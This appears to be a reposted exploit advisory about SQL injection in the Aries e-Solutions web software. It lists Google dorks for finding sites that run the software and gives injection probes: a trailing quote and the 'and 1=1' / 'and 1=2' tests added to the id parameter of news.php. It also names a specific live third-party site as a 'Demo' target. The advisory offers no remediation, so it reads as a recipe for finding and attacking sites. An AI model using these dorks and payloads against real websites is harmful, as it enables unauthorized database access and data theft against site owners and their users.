Aries e-Solutions SQL Injection
2020-11-08 00:17:43 Author: cxsecurity.com(查看原文) 阅读量:292 收藏

[+] Title: Aries e-Solutions SQL Injection [+] Author: h4shur [+] date:2020-11-07 [+] Vendor Homepage: http://ariesesolutions.com/ [+] Software Link: http://ariesesolutions.com/ [+] Tested on: Windows 10 & Google Chrome [+] Category : Web Application Bugs [+} Dork : intext:"Powered by Aries e-Solutions" intext:"Powered by Aries e-Solutions" inurl:"news.php?id=" intext:"Powered by Aries e-Solutions" inurl:".php?id=" ### Note: [+] Add the quotation mark (') to the end of the link : * Target.com/article.php?ID==4' [+] First add "and 1 = 1" and then "and 1 = 2" to the end of the link : * Target.com/news.php?ID=4 and 1=1 * Target.com/news.php?ID=4 and 1=2 ### Demo: [+] https://www.worldmedicalcouncil.com/news.php?id=3 ### Contact Me : * Email : [email protected] * twitter : @h4shur * Telegram : @h4shur * Instagram : @netedit0r


文章来源: https://cxsecurity.com/issue/WLB-2020110039
如有侵权请联系:admin#unsafe.sh